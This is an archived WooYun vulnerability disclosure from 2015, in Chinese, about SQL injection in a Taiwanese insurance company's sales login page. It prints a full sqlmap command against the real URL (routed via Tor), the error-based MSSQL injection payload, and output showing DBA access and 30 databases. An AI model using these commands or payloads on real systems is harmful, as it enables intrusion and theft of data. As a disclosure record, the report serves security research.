乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-25: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经确认,细节仅向厂商公开 2015-09-04: 细节向核心白帽子及相关领域专家公开 2015-09-14: 细节向普通白帽子公开 2015-09-24: 细节向实习白帽子公开 2015-10-09: 细节向公众公开
台湾某保险公司SQL注入/影响30个库
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://www.nid.com.tw/sales/login.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4NDY5MDUxNzVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQtodG1sX1N1Ym1pdAUKaHRtbF9SZXNldBescP2gXOCrXspeBZbQJdkwL5iI&__EVENTVALIDATION=%2FwEWBQKPqr34AgKw47aJDQLVurzPAQKTsonqAQKG8pyoAhs4YXG%2FxUR04nz6HnbjttsF6MbN&html_SalesID=A&html_SalesPwd=B&html_Submit.x=29&html_Submit.y=33" --threads=3 ---Parameter: html_SalesID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE4NDY5MDUxNzVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQtodG1sX1N1Ym1pdAUKaHRtbF9SZXNldBescP2gXOCrXspeBZbQJdkwL5iI&__EVENTVALIDATION=/wEWBQKPqr34AgKw47aJDQLVurzPAQKTsonqAQKG8pyoAhs4YXG/xUR04nz6HnbjttsF6MbN&html_SalesID=A' AND 6268=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6268=6268) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113))) AND 'KelF'='KelF&html_SalesPwd=B&html_Submit.x=29&html_Submit.y=33---[16:30:19] [INFO] testing Microsoft SQL Server[16:30:21] [INFO] confirming Microsoft SQL Server[16:30:29] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user: 'sa'current user is DBA: Trueavailable databases [30]:[*] 20120903[*] 2marry[*] 2narry[*] carpenter[*] cookery[*] customer[*] electr[*] fop[*] hottaiwan[*] longder[*] love[*] master[*] model[*] msdb[*] nationwideunion[*] nid[*] ntpu[*] rbva-roc[*] sales[*] salico[*] sanyinggas[*] taipeibeauty[*] TASTE[*] tempdb[*] Test[*] tradeunion[*] TRETSA[*] unionet3c[*] unions[*] yesall
过滤
危害等级:高
漏洞Rank:20
确认时间:2015-08-25 10:37
感謝通知!
暂无